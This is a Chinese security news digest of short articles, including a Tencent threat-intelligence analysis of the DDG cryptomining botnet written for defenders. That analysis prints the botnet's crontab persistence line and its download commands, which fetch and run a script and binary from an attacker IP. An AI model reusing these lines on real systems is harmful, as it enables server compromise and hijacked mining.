分类: 安全快讯

惠普打印机被发现偷偷回传数据:隐藏极深

在打印机行业,惠普可以说是霸主级别的存在,但是软件工程师Robert Heaton近日却发现,惠普打印机会将部分用户数据回传给惠普,默认开启,而且隐藏相当深。 据发现,在惠普打印机的安装过程中,有一个很难为人注意的“数据搜集通知与设置”(Data Collection Notice & Settings),惠普在其中声明会尝试搜集用户的相关打印情况,并传回给惠普,目的是改善广告、用户体验。 但是,惠普故意将传回数据类型的选择隐藏了起来,如果不是特别细心、特别懂技术,几乎不可能发现,而且这个“功能”是默认开启的,等于几乎所有用户在使用惠普打印机的时候,都在无意中将自己的相关数据交给了惠普。 惠普打印机会搜集所有产生文档的应用的相关数据,基本上你打印的所有类型文档(txt/doc/jpg/pdf等等)、时间戳、文档体积、使用报告等等,都在其中。 惠普在隐私政策中也强调了,惠普不会扫描用户打印文档的具体内容,只是相关特性和规格。 但是这种后台偷偷搜集数据的行为,让你的打印行为毫无隐私可言,仍然让人不寒而栗。   (稿源:快科技,封面源自网络。)

习近平论网络安全十大金句

共同织密网络安全防护网 ——党的十八大以来网络安全工作综述   当今中国,网信事业蓬勃发展,网民数量全球第一、电子商务总量全球第一。必须正确把握安全与发展的关系,让网络空间既充满活力又安全清朗。 “没有网络安全就没有国家安全。”党的十八大以来,以习近平同志为核心的党中央系统部署和全面推进网络安全和信息化工作。在习近平总书记关于网络强国的重要思想指引下,我国网络空间日渐清朗,网络安全保障体系日益完善,网络安全保障能力不断增强,网络空间命运共同体主张获得国际社会广泛认同。   全面构建网络安全制度体系 2015年12月,全球连锁酒店凯悦集团支付系统被恶意软件入侵,大量用户数据外泄;2018年3月,某社交平台有超过5000万名用户个人资料疑遭泄露…… 近年来,类似的黑客攻击和个人信息泄露时有发生,网络安全愈发引人关注。 习近平总书记深刻指出:“网络空间不是‘法外之地’。网络空间是虚拟的,但运用网络空间的主体是现实的,大家都应该遵守法律,明确各方权利义务。” 依法管网、依法办网、依法上网,确保互联网在法治轨道上健康运行,正是破题之策。党的十八大以来,我国始终坚持依法治网,形成党委领导、政府管理、企业履责、社会监督、网民自律等多主体参与的网络安全治理格局。 ——出台网络安全法、国家网络空间安全战略、“十三五”国家信息化规划等网络安全法律法规和战略规划,制定发布网络安全国家标准289项,网络安全各项工作纳入法治化轨道; ——组织开展移动互联网应用(APP)违法违规收集使用个人信息专项治理,对存在严重问题的APP采取约谈、公开曝光、下架等处罚措施,切实维护广大网民在网络空间的合法权益; ——建立关键信息基础设施安全保护制度,明确关键信息基础设施范围及保护工作部门,建立健全安全保护责任制,强化供应链安全管理和重要数据安全管理,加强监测预警和应急处置工作,不断提升安全防护能力。 近年来,国家相关部门持续开展“净网”“剑网”“清源”“护苗”等系列专项治理行动,网络谣言、网络色情等乱象得到有效整治。其中,针对老百姓深恶痛绝的电信网络诈骗犯罪,公安机关坚持侦查打击、重点整治、防范治理三管齐下。今年1至7月,共抓获电信网络诈骗犯罪嫌疑人6.5万名,破获电信网络诈骗案件7.5万起,同比分别上升32.3%和8.6%。自今年5月以来,发案数量与去年同期相比,连续4个月保持下降趋势。   共筑风清气正的网络家园 联合整治炒作明星绯闻隐私和娱乐八卦、约谈直播短视频平台、将违规网络主播纳入跨平台禁播黑名单……2018年以来,国家主管部门协同发力,对当前社交媒体及网络视频平台上存在的违法违规行为打出一系列“组合重拳”。 “还网络空间以风清气正,一定要好好整治这些乱象!”“严管这些带来负能量的主播们!”网民们支持、点赞的声音反映了广大人民群众对让网络空间清朗起来的热切期盼。 网络空间是亿万民众共同的精神家园,网络空间天朗气清、生态良好,符合人民利益。习近平总书记强调,我们要本着对社会负责、对人民负责的态度,依法加强网络空间治理,加强网络内容建设,做强网上正面宣传,培育积极健康、向上向善的网络文化,用社会主义核心价值观和人类优秀文明成果滋养人心、滋养社会,做到正能量充沛、主旋律高昂,为广大网民特别是青少年营造一个风清气正的网络空间。 从《“一带一路”大道之行》到《小账本连着大情怀》,从“砥砺奋进的五年”到“壮丽70年 奋斗新时代”,党的十八大以来,重大主题宣传综合运用互联网传播方式手段,形成“往深里走、往心里走、往实里走”的宣传效果。 抗灾救灾时的守望相助、见义勇为中的果敢无畏、热心公益里的慷慨解囊……党的十八大以来,正能量越来越多、越来越广地在网络上传播,那些感动中国的好人好事、浸润心灵的良知义举,生动具体地诠释着中国特色社会主义核心价值观,网络空间日益成为亿万民众共同的精神家园。   培育网络安全技术、产业、人才 商场购物,街边买菜,生活缴费,扫码支付已成常态。然而,享受便利的同时,人们也受到欺诈、盗窃等违法犯罪行为的滋扰。 如何让“扫一扫”更安全?支付宝推出保障计划,通过自主研发的智能实时风控系统,对每笔移动支付进行木马、钓鱼等8个维度的风险检测,防止二维码被复制和泄露,此外还配合人脸识别、眼纹等技术进行多因子验证,保障用户扫码支付安全。 “网络安全和信息化是一体之两翼、驱动之双轮。”网络安全,需要信息化发展作支撑,信息化发展需要网络安全来保障。 党的十八大以来,网络安全新兴技术不断涌现,防护网不断织密。一张小卡片能阻止敏感信息的获取、在线签证核身技术从源头对非法入境行为进行识别和拦截……网络安全产业迅速发展,增速领跑全球,根据中国信息通信研究院测算数据,2018年我国网络安全产业规模预计达545.49亿元。 “网络空间的竞争,归根到底是人才的竞争。”培养网络安全人才,才能夯实网络安全根基,更好地推动技术创新和产业发展,为建设网络强国提供智力支撑和人才保障。 2017年,中央网信办、教育部将西安电子科技大学、东南大学、武汉大学、北京航空航天大学、四川大学、中国科学技术大学、战略支援部队信息工程大学等7所高校,评选为首批一流网络安全学院建设示范项目高校。截至目前,已有40余所高校成立网络空间安全学院。 “网络安全人才培养和教育,不能孤立发展、闭门造车,而是要打造适应时代需要的复合型网络安全人才。”中国科学技术大学网络空间安全学院副院长、教授俞能海说。 推动全球网络安全治理体系变革 一个安全稳定繁荣的网络空间,对各国和世界都具有重大意义。如何共同维护网络安全,成为世界性课题。 “网络安全是全球性挑战,没有哪个国家能够置身事外、独善其身,维护网络安全是国际社会的共同责任。” “维护网络安全不应有双重标准,不能一个国家安全而其他国家不安全,一部分国家安全而另一部分国家不安全,更不能以牺牲别国安全谋求自身所谓绝对安全。” 在2015年第二届世界互联网大会开幕式上,习近平总书记向世界发出携手共建“网络空间命运共同体”的倡议,提出推进全球网络安全治理体系变革的“中国方案”,受到高度评价和广泛赞誉。 “‘中国的网络观’让人印象深刻。”著名计算机科学家罗伯特·卡恩说,习近平主席的一系列阐述,表明了互联网是一个非常独特的共同家园,所有人应该共同承担责任。 携手共建,方能乘风破浪。近年来,在中国的积极倡导下,从《网络空间国际合作战略》的发布,到杭州G20峰会《二十国集团数字经济发展与合作倡议》的签署,中国不断深化网络空间国际合作,推动世界各国共同构建一个安全稳定繁荣的网络空间。 中国不仅为推进全球网络安全治理体系变革提供“中国方案”,更以实际行动为世界网络安全和发展贡献中国力量。一大批优秀企业走出国门,在宽带信息基础设施、大数据、网络安全服务等新兴产业领域,为世界各国提供高质量的信息产品和安全技术服务。 “中国在共建网络空间命运共同体中扮演的角色十分重要。”塞尔维亚贸易旅游与通信部国务秘书塔提亚娜·马迪奇表示,作为世界上最大的发展中国家,中国保持自身安全发展的同时,还致力于推动世界各国共同搭乘互联网发展的快车,积极构建安全与公平的网络新秩序,“这为世界树立了榜样!”   (稿源:人民网,封面源自网络。)

警惕:DDG 挖矿僵尸网络利用 SSH 弱口令爆破攻击 Linux 服务器

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/twR_Jh3aT8n7be3kbmyDhA   一、背景 腾讯安全专家在为某企业客户进行例行安全巡检过程中,发现客户部署的腾讯御界高级威胁检测系统出现了SSH服务失陷感知信息。在征得客户同意后对客户机器进行远程取证,并结合御界的关键日志进行分析,我们发现这是一起针对SSH服务器弱口令爆破攻击事件。由于发现及时,工程师及时协助客户进行隔离及杀毒,并未造成损失。 腾讯安全御见威胁情报中心对本次攻击事件展开调查,结果发现,这是由大型挖矿僵尸网络DDGMiner发起的攻击事件。DDGMiner是最早于2017年被发现的挖矿僵尸网络,其特点为扫描攻击 SSH服务、Redis 数据库和OrientDB数据库等服务器,并在攻陷的服务器上植入挖矿木马挖掘门罗币获利。从病毒服务器的目录中last modified字段可以看到,本次攻击中样本的更新时间为2019-08-29,目前为4004版本。 对样本进行分析后,发现与此前版本不同的是,样本中新增了针对Nexus Repository Manager漏洞、Supervisord漏洞的利用攻击代码,其攻击流程大致如下: 根据腾讯云鼎实验室监测数据,云上主机遭受来自最新版本DDGMiner的攻击流量从2019.08.29开始出现,在8月30日到达峰值,8月31日到9月1日下降到一定范围之后趋于平稳,大部分攻击流量被有效拦截。 而在少量失陷主机中,90%以上遭到SSH弱口令爆破入侵,由此可见DDGMiner的主要传播方式仍然为SSH爆破。腾讯安全提醒企业用户务必使用高强度的SSH、Redis登录密码,避免因设置不当而遭受攻击造成不必要的损失。 二、详细分析 黑客在通过弱口令爆破或漏洞攻击入侵后首先下载Shell脚本i.sh,并将其安装为crontab定时任务每15分钟执行一次。 mkdir -p /var/spool/cron/crontabsecho "" > /var/spool/cron/rootecho "*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh" >> /var/spool/cron/rootcp -f /var/spool/cron/root /var/spool/cron/crontabs/root 然后检测是否已经存在进程nfosfa4,若存在则杀死进程并删除对应的文件,然后从服务器下载ddgs.$(uname -m)保存为nfosfa4,其中uname –m用来获取系统类型并映射到文件名。最后通过chmod +x给nfosfa4赋予可执行权限,从而完成木马的下载更新。 ps auxf | grep -v grep | grep nfosfa4 || rm -rf nfosfa4if [ ! -f "nfosfa4" ]; then curl -fsSL -m1800 http://68.183.140.39/static/4004/ddgs.$(uname -m) -o nfosfa4||wget -q -T1800 http://68.183.140.39/static/4004/ddgs.$(uname -m) -O nfosfa4fichmod +x nfosfa4 接着查找并杀死多个历史版本的病毒进程,进程名分别为nfosbcb、nfosbcc、nfosbcd、nfosbce、nfosfa0、nfosfa1、nfosfa2。 ps auxf | grep -v grep | grep nfosbcb | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosbcc | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosbcd | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosbce | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosfa0 | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosfa1 | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosfa2 | awk '{print $2}' | xargs kill -9 然后启动病毒的最新版本nfosfa4,病毒被存放于以下四个目录之一。 /usr/bin/nfosfa4 /usr/libexec/nfosfa4 /usr/local/bin/nfosfa4 /tmp/nfosfa4 nfosfa4是采用golang语言开发,编译成基于Linux的ELF可执行文件,并且采用UPX加壳保护。golang语言是一款开源编程系统,其优点为简单可靠,支持夸平台编译等。golang语言非常适合服务器编程、分布式系统和数据库相关的网络编程,而DDGMiner恰好符合这些特点。 为了便于分析,我们通过Linux下的UPX脱壳工具进行脱壳,然后使用IDAGolangHelper脚本在IDA中对函数进行重命名。处理之后可以比较清晰的看到样本中漏洞攻击、挖矿、清除挖矿竞品等功能。 在还原后的函数中,可以看到针对SSH爆破、以及针对Redis服务器、Supervisord服务器、Nexus Repository Manager服务器的漏洞利用攻击代码。 样本还使用了hashicorp的go开源库memberlist来构建分布式网络,memberlist是用来管理分布式集群内节点发现、节点失效探测、节点列表的开源程序(github: https://github.com/hashicorp/memberlist)。样本初次到达受害机时,会获取本地节点的地址和状态信息,然后尝试连接到内置的ip列表中的远端节点从而加入远端的集群。 memberlist利用被称为“疫情传播算法”的Gossip协议在僵尸网络集群中同步数据。Gossip 过程由种子节点发起,当一个种子节点有状态需要更新到网络中的其他节点时,它就会随机的选择周围几个节点散播消息,收到消息的节点也会重复该过程,直至最终网络中所有的节点都收到了消息。病毒通过这个过程将某个节点上获得更新的挖矿木马和攻击脚本同步到所有节点。 最后,在挖矿功能部分,通过main_ptr_miner_Download函数下载,main_ptr_miner_Update更新,main_ptr_miner_CheckMd5校验矿机Md5值,以及通过main_ptr_miner_Run启动矿机,并且通过调用main_ptr_miner_killOtherMiner对其他挖矿木马进行清除。 三、安全建议 1、使用高强度的Redis登陆密码、SSH登陆密码, 必要时添加防火墙规则避免其他非信任来源ip访问。 2、及时修复Redis、Nexus Repository Manager、Supervisord服务相关的高危漏洞。 3、已中毒的linux服务器可采用以下手动清理方案。 a)、crontab如果如果包含以下内容,进行清理: "*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh" b)、/var/spool/cron/root文件,如果包含以下内容,进行清理: "*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh" c)、/var/spool/cron/crontabs/root文件,如果包含以下内容,进行清理: "*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh" d)、删除以下文件 /usr/bin/nfosfa4 /usr/libexec/nfosfa4 /usr/local/bin/nfosfa4 /tmp/nfosfa4 /usr/bin/betsbcc /usr/libexec/betsbcc /usr/local/bin/betsbcc /tmp/betsbcc /usr/bin/brhjbcc /usr/libexec/brhjbcc /usr/local/bin/brhjbcc /tmp/brhjbcc e)删除/tmp目录下文件 qW3xT, qW3xT.1, qW3xT.2, qW3xT.3, qW3xT.4, ddgs.3010, ddgs.3011, ddgs.3013, ddgs.3016, 2t3ik, 2t3ik.m, 2t3ik.p, 2t3ik.s, imWBR1, imWBR1.ig, wnTKYg, wnTKYg.noaes, fmt.3018 4、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。 IOCs IP 68.183.140.39 URL hxxp://68.183.140.39:8000/static/4004/ddgs.x86_64 hxxp://68.183.140.39:8000/static/4004/ddgs.i686 hxxp://68.183.140.39:8000/i.sh MD5 bdfa1c43b3e03880d718609af3b9648f 76309d50ad8412954ca87355274bd8ff 4f0ef26b713d28469d08a8a833339e77 参考链接: https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/

微软总裁在新书中透露:特朗普顾问希望微软帮助美国政府监视其他国家

据外媒MSPoweruser报道,微软总裁兼首席法律顾问布拉德·史密斯(Brad Smit)最近发行了他的新书《工具和武器:数字时代的希望和危机》(Tools & Weapons: The Promise and the Peril of the Digital Age),而这本书打开了“潘多拉魔盒”。 本周早些时候,外媒曾报道称布拉德·史密斯认为美国政府对待华为的方式一点也不美国(un-American)。史密斯在其新书中还透露,泰勒·斯威夫特的律师曾在2016年威胁要起诉微软。因为微软的聊天机器人Tay的名字和Taylor很相似。 现在,Geekwire引用了他的书中的一段话,其中揭示了特朗普政府如何希望微软帮助其监视其他国家。史密斯在书中写道:“作为一家美国公司,你为什么不同意帮助美国政府监视其他国家的人?”他指出,微软向美国政府明确表示他们不愿意接受有关这个问题的任何讨论。 我指出,特朗普酒店刚刚在中东和宾夕法尼亚大街的街道上开设了新房产。“这些酒店是否会对那些留在那里的其他国家的人进行监视活动?这对家族企业来说似乎不太好。 – 当特朗普顾问询问为什么微软不帮助他们监视其他国家的人时,布拉德·史密斯如是说 布拉德·史密斯在新书中还介绍了微软等公司面临的类似复杂的法律和道德挑战。他指出,特朗普并不是第一个对微软提出异议的总统。该书的内容还包括微软与奥巴马政府就隐私与面部识别政策等问题存在分歧的情况。 政府如何管理比自己更大的技术?这可能是技术监管未来面临的最大难题。但是一旦你提出这个问题,答案的一部分就变得清晰了:政府需要共同努力。 – 布拉德·史密斯   (稿源:cnBeta,封面源自网络。)

黑客通过伪造 PayPal 网站传播勒索软件

近期,有网站通过冒充 PayPal 官网,向不知情的用户传播 Nemty 勒索软件的新变种。 这个恶意软件的运营商正在尝试各种分发渠道,因为它被检测出是 RIG 漏洞利用工具包(EK)的有效载荷。   通过返现奖励引诱用户 当前最新的 Nemty 来自于该假冒 PayPal 网站,该网站承诺,将返还支付金额的 3-5% 给使用该网站进行支付操作的用户。   网友可以通过一些细节判断出此网站并非官网,该网站也被多家主流浏览器标记为危险,但用户还是有可能会继续下载和运行恶意软件“cashback.exe”。 安全研究人员 nao_sec  发现了新的 Nemty 分发渠道,并使用 AnyRun  测试环境来部署恶意软件并在受感染的系统上跟踪其活动。 自动分析显示,勒索软件加密受害主机上的文件大约需要7分钟。具体时间可能因系统而异。 幸运的是,该勒索软件可以被市场上最流行的防病毒产品检测到。对 VirusTotal 的扫描显示 68 个防病毒引擎中有 36 个检测到了该软件。   同形字攻击 因为网络犯罪分子使用的就是原网页的构造,所以该诈骗网站看起来就是官方网站。 为了增强欺骗性,网络犯罪分子还使用所谓的同形异义域名链接到了网站的各个部分(包括帮助和联系,费用,安全,应用和商店)。 骗子在域名中使用来自不同字母表的 Unicode 字符。浏览器会自动将它们转换为 Punycode  Unicode 中的内容看起来像 paypal.com,而在Punycode 中以 ‘xn--ayal-f6dc.com’ 的形式存在。 安全研究员 Vitali Kremez 指出这个 Nemty 勒索软件变种目前处于1.4版本,此版本修复了前版本中的一些小错误。 他观察到的一件事是“isRU” 检查已经被修改了,该检查可以验证受感染的计算机是否在俄罗斯,白俄罗斯,哈萨克斯坦,塔吉克斯坦或乌克兰。在最新版本中,如果检查结果为真,那么恶意软件不会随着文件加密功能而移动。   但是,这些国家/地区以外的计算机会被设为目标,他们的文件会被加密,副本也会被删除。 根据测试显示,黑客提出的赎金为 0.09981 BTC,约为 1,000美元,并且支付门户被匿名托管在了 Tor 网络上。 8月底,另一位安全研究员  Mol69 看到Nemty 通过RIG EK 进行分发,这样的做法十分反常,因为瞄准 Internet Explorer 和 Flash Player 这些不受欢迎的产品的攻击套件目前已经基本不存在了。   消息来源:BleepingComputer, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

Web 工具 MANRS Observatory 发布:可监测网络路由安全

近期由非营利组织国际互联网协会(Internet Society)支持倡导的路由安全相互协议规范(MANRS)活动,致力于让互联网服务提供商注意他们的举止,特别是涉及如何使用边界网关协议(BGP),偶尔滥用通信方法驱动互联网流量的大部分路由。 在8月13日,MANRS倡议活动启动了MANRS Observatory,这是一项全新的Web工具,可以深入了解网络如何符合路由安全标准。该观察站为大多数用户提供了看不到的互联网部分透明度。 路由安全对网路的未来和稳定至关重要,但它却一直遭受威胁2018年有超过12000起路由中断或攻击事件,造成资料遭窃,损失收入,损害声誉等;去年因奈及利亚ISP业者引起的路由泄露,使得谷歌的讯务被误导至中国,导致世界许多地方网路中断,另外,今年6月,一次大规模的路由泄露让网路断线好几小时。 MANRS Observatory藉由追踪路由事件的数量,以及监测MANRS行动指标,来显示该网路遵守MANRS的合规程度。该工具将来自多个可信任第三方的数据,并使用对使用者友好的界面呈现。 使用MANRS Observatory工具的好处: 成效衡量指标:参与者可轻松地监控他们遵守MANRS要求的合规程度,并对其安全控制进行必要的调整。 业务发展:参与者可比较他们与同行间的表现,并利用MANRS瞭望台来判断潜在合作伙伴的安全措施是否达到标准。 政府:政策制定者更可了解路由安全和灵活性的情况,并透过呼吁采用MANRS最佳实践做改善。 社会责任:实施MANRS是自愿性的,步骤简单,且不会造成破坏瞭望台可协助参与者确保他们和同行的网路安全,也有助于提高整体网路的路由安全。   (稿源:cnBeta,封面源自网络。)

继 CEO 被黑后 Twitter 停用通过 SMS 发布推文的功能

据外媒报道,Twitter日前暂时关闭了通过短信发送推文的功能。就在几天前,该功能遭到了黑客的滥用,其在Twitter CEO杰克·多西的账号上发布了种族歧视、炸弹威胁以及其他粗俗的信息。 据了解,通过短信发布推文这项功能在Twitter早期是一个重要的功能,但现在它更像是一个遗产功能,因为大多数用户都通过手机应用发布推文。但不管如何,这个功能还是存在。 当某人的手机号码被盗时就可能会导致问题的发生。现在,黑客越来越多地开始使用这种技术攻击账户,因为电话运营商往往不太注意对账户进行适当的安全保护。而这正是上周五发生在Twitter CEO身上的事。当黑客获得了他的号码后他们就可以用他的用户名发短信甚至不需要登录他的账户。 Twitter表示,关闭这一功能的目的是为了保护用户的账户。另外这家公司还指责移动运营商,称其需要解决允许这种滥用行为存在的漏洞问题。此外,Twitter还表示,公司还需要改进其双重认证系统,因为这套系统也依赖短信,所以可能也会受到同样的危害。 看起来Twitter要在大多数国家关闭这个通过短信发推文功能。不过Twitter指出,它将很快在依赖短信进行可靠沟通的市场重新上线该功能,另外还将为该功能制定长期战略,至于具体内容是什么则没有透露。   (稿源:cnBeta,封面源自网络。)

Facebook 发布数据迁移和隐私问题白皮书

据外媒报道,日前,Facebook发布了一份旨在为数据迁移和隐私问题提供指南的白皮书。在这份报告中,Facebook列出了该公司认为跟构建隐私保护的数据迁移有关的五个基本问题:   什么是数据迁移? 哪些数据应当被迁移? 谁的数据应当被迁移? 在迁移的时候我们应该怎么做来保护隐私? 当用户的数据被迁移后,如果数据遭到了误用或没有得到适当的保护那么又该由谁来负责?   Facebook认为,通过这份白皮书不仅可以充实GDPR和CCPA等现有的数据迁移监管规定还可以帮助解决与之相关的问题。Facebook副总裁兼首席隐私官Erin Egan在博客中写道:“从用户到初创企业再到老牌企业,数据迁移有可能造福于所有人。我们希望这篇文章将成为跟全球隐私专家、政策制定者、监管机构和其他公司进行一系列关于讨论如何进行数据迁移来在降低风险的同时实现最大化收益的对话的开端。”     (稿源:cnBeta,封面源自网络。)

谷歌发布 Chrome 紧急补丁 修复可执行任意代码的高危漏洞

面向Chrome用户,谷歌今天发布了一项紧急安全更新,修复了可以执行任意代码的漏洞。谷歌正向Windows、macOS和GNU/Linux平台上的Chrome浏览器进行推送,该更新标记为“urgent”(紧急),该漏洞允许黑客完全控制你的PC。 援引外媒Lifehacker报道,这个漏洞是由互联网安全中心(Center for Internet Security)发现的,并敦促用户立即更新谷歌浏览器。公告中写道 在谷歌Chrome浏览器中发现了一个漏洞,允许黑客执行任意代码。这个漏洞是Blink引擎中的一个use-after-free漏洞,如果用户访问或者重定向到某个特定网页就可以激活这个漏洞。 成功利用此漏洞可能允许攻击者在浏览器使用情境中执行任意代码,获取敏感信息,绕过安全限制并执行未经授权的操作,或导致拒绝服务条件。 根据与应用程序关联的权限,攻击者可以安装程序;查看,更改或删除数据;或创建具有完全用户权限的新帐户。 互联网安全中心向所有Chrome用户推荐以下内容,以确保他们不受此漏洞的影响。 立即升级使用谷歌稳定渠道的最新版本,以避免被这个漏洞利用。 以非特权用户(没有管理权限的用户)运行所有软件,以减少成功攻击的影响。 提醒用户不要访问不受信任的网站或关注由未知或不受信任的来源提供的链接。 告知用户有关电子邮件或附件中包含的超文本链接所构成的威胁,特别是来自不受信任的来源的威胁。 将最小权限原则应用于所有系统和服务。 谷歌已经发布了一个应该立即安装的补丁。即便如此,如果你是偏执狂,你可以前往菜单>帮助>关于谷歌浏览器,并验证是否安装了最新版本(76.0.3809.132)。谷歌还修复了一些漏洞,但已从“版本”页面中删除了相关信息。   (稿源:cnBeta,封面源自网络。)

谷歌扩展安全奖励项目 覆盖数据滥用和更多 Android 应用程序

自 2010 年推出除虫赏金项目以来,谷歌已经向安全研究人员支付了超过 1500 万美元的奖励。今天,这家科技巨头宣布进一步拓展 Google Play 安全奖励项目(GPSRP)的范围,以覆盖上亿的 Android 应用程序。与此同时,谷歌与 HackerOne 合作推出了开发者数保护奖励(DDPRP)项目,适用于针对 Android 应用、OAuth 项目、以及 Chrome 扩展程序的数据滥用。 谷歌认为,除虫奖励项目是其内部安全计划的一个有力补充,能够激励个人和安全研究机构帮助其找到缺陷并正确地披露,而不是将之在灰色市场兜售或恶意使用。 与其等到发生难以挽回的严重后果,还是掏钱奖励安全研究人员来得划算。此外,在今天的更新发布之前,谷歌还于上月增加了 Chrome 浏览器、Chrome OS、以及 Google Play 的安全研究奖励。 截至目前,Google Play 安全奖励(GPSRP)项目已经向安全研究人员支付了超过 26.5 万美元的赏金。随着该项目覆盖更多热门的应用,未来谷歌有望拿出更多的预算。 同时,谷歌还在努力提升自动筛查漏洞的技术能力,为 Google Play 中的所有应用查找类似的漏洞。如有应用开发者受到影响,可通过 Play 控制台接收到相应的通知。 据悉,谷歌的应用安全改进(ASI)项目,能够为开发者提供与漏洞及其修复方法相关的信息。 今年 2 月的时候,谷歌透露 ASI 项目已帮助超过 30 万名开发者,在 Google Play 上修复了超过 100 万个应用。 至于新增的开发人员数据保护奖励(DDPRP)计划,旨在识别和减轻针对 Android 应用、OAuth 项目、以及 Chrome 扩展程序中的数据滥用问题。 若研究者可体征验证明确的数据滥用,谷歌将会根据 DDPRP 的奖励方案给予一定的报酬,因为该公司对用户数据被外使用或出售等情况尤为关切,最高可送上单笔 5 万美元的奖金。 那些被认定存在数滥用行为的 Android 应用和 Chrome 扩展程序,不仅会被 Google Play 和 Chrome 网上应用店下架,其开发者也会被限制对相应 API 的访问。   (稿源:cnBeta,封面源自网络。)